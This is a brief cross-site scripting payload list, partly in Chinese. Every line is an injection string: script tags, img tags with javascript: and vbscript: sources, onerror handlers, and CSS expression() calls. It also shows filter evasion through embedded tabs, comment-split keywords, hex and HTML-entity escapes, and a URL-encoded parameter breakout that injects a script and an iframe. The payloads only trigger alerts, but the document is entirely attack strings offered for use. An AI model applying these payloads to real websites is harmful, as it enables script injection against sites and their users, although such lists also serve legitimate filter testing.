<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ???? is whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["